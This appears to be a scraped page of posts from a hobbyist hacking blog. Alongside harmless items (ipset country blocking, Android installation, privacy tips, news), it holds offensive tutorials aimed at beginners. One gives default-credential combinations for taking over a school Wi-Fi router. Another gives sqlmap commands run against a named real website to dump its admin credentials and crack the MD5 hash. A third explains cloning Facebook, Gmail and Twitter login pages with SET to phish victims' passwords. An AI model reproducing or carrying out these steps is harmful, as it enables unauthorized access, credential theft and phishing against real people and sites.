Block IPs Of Country And Stop Hacker

Some times you want to break access of some IP from a country to your website, so how to stop him ?

Somebody told you use application mod_geoip with Apache and also more but this application isn't globally.If you use Apache to block IPs, still many ports are open to blocked country. So here i am going to tell you one another things which works with Linux OS for block IPs.

Here i am tell you about IPSet  for make object successful so i am starting with introduction of IPSET...


ipset is used to set up, maintain and inspect so called IP sets in the Linux kernel. Depending on the type of the set, an IP set may store IP(v4/v6) addresses, (TCP/UDP) port numbers, IP and MAC address pairs, IP address and port number pairs, etc. See the set type definitions below.
Iptables matches and targets referring to sets create references, which protect the given sets in the kernel. A set cannot be destroyed while there is a single reference pointing to it.

Feature of IPset:


1. Store Multiple IPs and Ports on the Table and doing matching at the working time.
2. Dynamic Update of IPs and Ports without low performance.

We will need the Source Code for install IPset on the Linux so for it always used Current Kernal. Mostaly the Kernel Source Code is found under  /usr/src/linux-<version> which access as
  /usr/src/linux-(uname -r) at shell.

There are two version of IPset available ...


For the new branch
linux kernel source code (version >= 2.6.34)
source of ipset: ipset-6.11.tar.bz2 (md5sum)
For the old branch
linux kernel source code (version >= 2.6.16 or >= 2.4.36)
source of ipset: ipset-4.5.tar.bz2 (md5sum)

 For Download Click Here

Installation Of IPset:

Open your Linux Terminal and follow the steps.

First Extract the ipset, here i am try ipset-4.5.tar.gz ....

>tar -xf ipset-4.5.tar.gz

Now going for change the directory to ipset-4.5....

>cd  ipset-4.5

Here i am consider the kernel source code available at /usr/src/linux-(uname -r) ,so i am going to compile ipset:

>make KERNEL_DIR=/usr/src/$(uname -r) IP_NF_SET_MAX=256 IP_NF_SET_HASHSIZE=1024

Here IP_NF_SET_MAX controls the maximum number of IPSets and IP_NF_SET_HASHSIZE set the default size for hash maps.

Now , i am going to install the IPset ,i thing you would know about  "sudo" or "su -c" ,lets run command...

>sudo make install        

or 

>su -c 'make install'

After installation you will be ready for Block IPs.

Creating IPsets and Add IPs :

See below command :

# ipset  -N  countries  nethash

First thing is here, above write command execute as root ,and this creates a ipset which name is 'country' of type 'nethash'  , i am explain it step wise step see....

'Countries'  each set can be found in ipset and start adding IP address to set.

'nethash' is a set type, if you want know more then going to here  http://ipdeny.com/

We had created set named "countries" , now start adding IPs address to the set ,if i want blocking china IPs so add IPs of this zone from here http://www.ipdeny.com/ipblocks/data/countries/cn.zone

Here i am use simple for-loop for get to retrieve zone files:

# for IP in $ (wget -0 - http://www.ipdeny.com/ipblocks/data/countries/cn.zone)

> do

> ipset -A countries $IP

>done

Now all the IPs are add in countries set if you want to add new IPs so i am tell you a nethash store up to 65535 address,if you want add more then make new set for these.

I think my this post very helpful for a website admin if you want know some more command and information then click below link:

http://ipset.netfilter.org/ipset.man.html 

http://www.ipdeny.com/ipblocks/data/countries/  (Sets of Country IP Zone)

http://ipset.netfilter.org/iptables.man.html 

Please given comment and tell me you like or not my this post.

Read more..

How To Install Android Ice Cream Sandwich On Your NoteBook

Today I am going to show how you can install Androidx86 latest version of Android Operating System also called ICE CREAM SANDWICH on your NoteBook.

What the profit of  doing it? I think you never want to spend money for buy a new Android based Tablet PC. So now let's start.

FIRST DOWNLOAD LATEST VERSION OF ANDROID FROM HERE

Next Work makes Android Download .iso file boot-able so for this use tool  UNetbootin   and your PenDrive .

Enter your PenDrive and make bootable file on it by help of  UNetBootin .Below i am showing view of UNetbootin ,see pic...

When Your PenDrive ready for work then Enter it on your Notebook and  START your Notebook , When your Notebook  boot for OS then Press Key F2 or F8 then a blue screen window open ,here going on Boot Section and and select the Removable Device , see below pic...

When your NoteBook Start booting by Removable Device means by your PenDrive then a screen come like below pic...

Here Select Installation-Install Android-x86 to harddisk , then processing start it take some time.

And after some times your Android based NoteBook start working. Problem comes in Some Application at running  time but it work very well for you

So Enjoy your Android Based NoteBook .

Read more..

[Video Tutorial] How To Hack IIS Exploit Website

This Video Tutorial Made for those person who want to know about IIS Exploit Website Hacking  

Website Hack will be making very simple when you follow this video steps. 

For Read the Tutorial Click Here

Read more..

How To Hack School Wi-Fi Router

My this post helpful for you on hacking your school wi-fi router.Basically this thread write for Newbie so if you works on Intermediate level of hacking so it is not for you.

So friend by hack your school router,you change all the settings and also restrict the other person by internet. You also trace the Request of your friends which send to server by him.

First open your Command Prompt or CMD. Going to RUN and write CMD and then press RUN button,when you did it a black window open like below pic.Here write command "IPCONFIG" see below pic..

When you press ENTER Key after write IPCONFIG ,you found your IP address also Default Gateway.

In my case i had found IP 192.168.0.8 and Default Gateway 192.168.0.7  see below pic...

This Default Gateway is the address of your School Wi-Fi Router Admin Page ,so Open your Web Browser and write the Default Gateway address 192.168.0.7 on the Web Browser address Bar.When have you done it then a page open which want Username  Password ,see below pic...

Mostly School and Collage Wi-Fi not Secure, a Router come with username and default password means mostly router have Username is "admin" and no any Password. And your Faculty never change it so you use below write Username and password combination for access the admin page...

Username:Password Combinations:

admin:admin
admin:administrator
admin:password
admin:
administrator:administrator
administrator:admin
administrator:password
administrator:
guest:guest
guest:password
guest:


 In my case,I am use D-Link Wireless N Router in which Username is "admin" and no any password by factory side,So i am write only admin and press Login,see above pic.

When all thing going on according write in upper part of this post then you see Router Admin Page like below pic...

Now going to "Tools" and then "Admin" and change Username and password ,it never want old save information. See below pic...

I think my this post helpful for Newbie.If you like my Website so plz Follow my Site.

Enjoy Hacking!!!!

Read more..

SQL Injection Attack by BackTrack 5

Hello Viewer, Now i am come again with my new thread. You like my old post  Hack Facebook,Gmail,Yahoo and Twitter Account by BT5  so thanks for it. Now i am going to write my new tutorial in Backtrack Series.

I think you would know or hear about SQL Injection, IF you say "YES" so it's is good or else you say "NO" so please read about it by my old post...

Complete SQL Injection Attacks With Pics

Hack Website By Havij 

I think my old tutorial is too good and also very helpful for a Newbie. Here i will going to tell you only How to Doing SQL INJECTION  Attacks by BackTrack 5.

So Follow my steps and done it successfully!!!!

NOTE: IF you face some problem in viewing the picture clear,so open the picture in new tab.

STEP1: Below pic show you a website which name is www.junincc.com.ar ,Now i am used my Backtrack Skill and find that website Admin name and password.

STEP2: Open your BackTrack Terminal and Write "cd /pentest/web/scanners/sqlmap"   and Hit Enter Key like below pic...

STEP3: Now i am going to find out Website DataBase name,so for it write...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 --dbs


For Example see below pic...

STEP4: When you done step 3 then you see after sometime processing a list of DataBase name come like below pic in which all name under RED color ring...

Now choose any DataBase name for Forward Processing.In my case,i am select "junincc_junincc".


STEP5: After select DB name now write on forward step...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc --tables


i am write these command for find tables name under DataBase junincc_junincc  see below pic...

STEP6: When you have done step 5 then you see a list of tables come,In my case you see below pic where tables name in under of RED color ring....

Now here i am select "usuarios" for find out columns name by Tables.





STEP7: For Find Columns name of any Table write below command...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios  --columns


See below pic...

STEP8: When you have done step 7 then you found a list of Table's columns,see below pic all columns name in table  usuarios write in RED color ring...

Here i am select two Columns name for future work which name is " clave , usuario " .



STEP9: Now i am going to find about columns information which save in column "clave , usuario" ,so run these command......

python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios  -C clave,usuario --dump


See below pic...

STEP10: When you run step 9 command then in some steps it ask for forward processing show you write "Y"  and press ENTER KEY,see below pic...

STEP11: Wait for some time then you see result like below pic...

Here "admin" is the ADMIN account ID Name and password encrypt in MD5 ,For Decrypt it go to online MD5 Decryption Website and Decrypt the Password of Admin site.


I hope u will be successful in your work,so all the BEST!



IF YOU LIKE MY WEBSITE SO PLEASE FOLLOW IT AND MAKE ME STRONG FOR FUTURE,THANKS!!!!!

Read more..

Facebook down for two hours across Europe, May be DDOS attack !

In a DDoS attack, hackers deliberately render servers inaccessible by overloading them with traffic. Such a barrage aimed at DNS servers can make it impossible to connect users to a website when they type the address. Where as facebook said that its service was unavailable in some European countries this morning because of technical problems.

Third parties suggested a problem with Facebook's European DNS servers may have been at the root. These machines connect the address "Facebook.com" with the actual content of the website, and during the outage attempts to contact to them as normal received no response.

DownRightNow, which monitors major web services, showed Facebook having suffered ongoing intermittent service until mid-afternoon.CERT.Be, a Belgian government agency, claimed that the outage was due to a DDoS hacker attack, but this has not been confirmed.

Later Facebook announce, 'The issue has been resolved and everyone should now have access to Facebook. We apologise for any inconvenience.'

The blackout also affected users in France, Germany, Russia and South Africa,among others.Facebook, which has about 845 million active users worldwide, last month announced plans to raise $5bn in an stock market flotation expected tovalue the company at between $75bn and $100bn.

Source: TheHackerNews

Read more..

ShellDetect - Shell Code Detector Tool

Shell Detect is the FREE tool to detect presence of Shell Code within a file or network stream. You can either provide raw binary file or network stream file as input to this tool.

These days attackers distribute malicious files which contains hidden exploit shell code. On opening such files, exploit shell code get executed silently, leading to complete compromise of your system . This is more dangerous when the exploit is 'Zero Day' as it will not be detected by traditional signature based Anti-virus solutions. In such cases ShellDetect may help you to identify presence of shell code (as long as it is in raw format) and help you to keep your system safe.

New version 1.1 provides support for detecting Unicode Shellcode. Now you can directly feed unicode shellcode without converting it to binary or raw form. For example, %u4141%u4242 can be used directly. It also includes minor changes to main handler (schandler) program.

We recommend running this tool in Virtual Environment (using VMWare, VirtualBox) as it may cause security issues on your system if the input file is malicious.

Currently ShellDetect tool is in experimentation stage and works on Windows XP (with SP2, SP3) only.

ShellDetect requires following components....

Python - Install latest version 

Vmware/VirtualBox (optional) 

You can provide input file as raw binary file or network stream data. Here are the possible examples.

Eg 1: Generate shellcode from Metasploit in "raw" format and save it in a file. Then feed that file as input to ShellDetect.py.

Eg 2: Send exploit to any server on FTP and capture the traffic using tcpdump/wireshark, save the traffic in binary format and then feed that file to ShellDetect.py

Alternatively you can also download the sample files (password: securityxploded) and play around with the tool.

We recommend running it in Virtual Environment (using VMWare, VirtualBox ) as it may cause security issues on your system if the input file is malicious.

Click Here For Download It

Read more..

Make Self-Deleting Email

What is Self-Destructing-Email?

Self-Destructing-Email is the original tracking service of its kind, and remains the most powerful and reliable email and document tracking service in the world today. In short - Self-Destructing-Email tells you when your tracked emails and documents are opened / re-opened / forwarded and so much more.

There are lots of great features available to you - these include the following sending options:

Certified email

Ensured-Receipts and retractable emails

Invisible tracking

Self-Destructing emails

Block printing

Adobe Acrobat PDF Document Tracking

Track MS Word or Excel documents

First Go Here and Make your free account.

Use name of account by which you want send the Email.

Now go to your account and type account name for which you want send email with .self-destructing-email.com


For example i want to send a mail to my account hrde@hackermail.com so i am type....


hrde@hackermail.com..self-destructing-email.com    


see below pic...

When your friend found email then that see message like below pic....

And when he click on link a message appear on screen like below pic...

After 1 Minute Email self Delete like below pic...

For Know Message Status go to http://www.self-destructing-email.com/

I think i would make it interesting for you.

Read more..

How to save yourself by Google’s new privacy policy

Google has officially implemented its new, combined privacy policy. On the company’s Privacy Policy page, Google describes everything from how it collects information across its many sites to what it does with all that information.

After announcing plans in January to implement a combined privacy policy that covers all of its many services, the search company said that it would make for a “beautifully simple, intuitive user experience.”

“The main change is for users with Google Accounts. Our new Privacy Policy makes clear that, if you’re signed in, we may combine information you’ve provided from one service with information from other services,” Alma Whitten, director of privacy, product and engineering, wrote in a blog post at the time. “In short, we’ll treat you as a single user across all our products, which will mean a simpler, more intuitive Google experience.”

But not everyone is too pleased the search giant went forward with the change. In a letter dated February 27 and obtained today by CNET, France’s data protection authority, the Commission Nationale de l’Informatique et des Libertes (CNIL), wrote to Google CEO Larry Page saying that the privacy policy might not be lawful under European Union rules.

“The CNIL and the EU data protection authorities are deeply concerned about the combination of personal data across services,” the letter reads. “They have strong doubts about the lawfulness and fairness of such processing, and about its compliance with European Data Protection legislation.”

So how to safe yourself by trace of Google,Here i am going to tell you some tricks by which you save your Surfing History Information,So read below.....

1.Google said that they will be saved information of Login User so mostly when you surf never Login.

2.If you have login in one tab of browser then in second tab next google service also come in same Login.If you want open two or more service so try different Browser for this.

3.In all browser for example Chrome, Mozila ,IE etc. have PRIVATE BROWSING option so use it. You used to Private Browsing  in daily work.

4.For Know what Google Knowing about you yet so use "DATA LIBERATION TOOL". By this you also will be able to Remove, Import and Transfer the information. For this going to www.dataliberation.org where you found Google Service list, you also found  how can remove information.

5.One more trick but it works on small level by which you delete the Searching History by Google DATABASE....

Go to Google.com >> Login >> In address bar type www.google.com/history

When Page open and you found "Turn Web History On" Button means now Google not start your Tracing.

If there you find "Web History Is On" then in same page you found "Remove All Web History" turn off.

All Information I have got my own way if you know something more so write in comment or Mail me. My mail address is         hrde@hackermail.com

If    

Read more..

Hack FaceBook,Gmail,Yahoo and Twitter Account By BACKTRACK 5

Hello Friends, i think you would have done work which that i am told you in my last post of BackTrack Series. Now i am bore so think why not share with you some interesting , so here i am going tell you a trick by which you must hack any FACEBOOK , GMAIL , YAHOO , TWITTER and any one yes any one Account of a Victim . I think you would know about Page Phishing very well if not so see my this post....

Phishing Attack-All In One Tool

In old trick you had done many steps like...

1.Take Copy of Login Page 

2.Search the code line

3.Changing Code

4.Making Account on Web Hosting Site (Sometimes your account deleted by Hosting Site because you had used it for Phishing)

5.Wait for Web Hosting Site Account Verification 

6.Uploading Login Page on Web Hosting Site

7.Send Link to Victim 

8.Found the Victim Information 

Means it is too time and difficult work for a newbie , So i think why not tell you Page Phishing Hacking in BT5,Interesting you Know,By this trick you found victim ID and Password by run some commands only,

So Let's Start...............

1.First Open your BT5 Terminal and for find your IP on Internet type   "ifconfig"  like me in below pic and i have found my IP 1.22.120.115 .

2. In Second step type "cd /pentest/exploits/set" like below pic....

3. Now after step 2 type "./set"  like below pic...

4. Enter your choice: 2 for select WebSite Attack Vectors like below pic...

5.After done step 4 Now Select "Tabnabbing Attack Method" by Enter Your Choice :4 see below pic..

6. Now Select "Site Cloner" by Enter Your Choice :2 See below pic...

7.Too important step here When you have done Step 6 then it say "Enter The URL to Clone:" which means here Enter the page address of login page which Phishing Page you want like i want make FaceBook phishing page so i have going to enter :  http://www.facebook.com/


If you want make Gmail Phishing page so enter  http://www.gmail.com/  and as same as for Twitter,Yahoo and any one you want make. See below pic.....

8.When you have done step 7 then it called to press Return so write Return like me and press ENTER KEY  same as below pic...

9.Now my IP 1.22.120.115 works as Phishing Page link so send your IP to your Victim by Chat or Email and by any path you also change your IP into a Link By Googlr URL Shortener  and then send it to that person.

10. When your Victim open  your send Link then a Phishing Page come in his browser like below pic...

11. Now When your victim Enter His ID and Password for open his account then page Refresh and change into Real URL page and ID Password come into your Terminal Screen see below pic....

I think my this post too simple and also helpful for you IF you like my Website so please Follow it Thanks!

Enjoy Your Hacking!!!

Read more..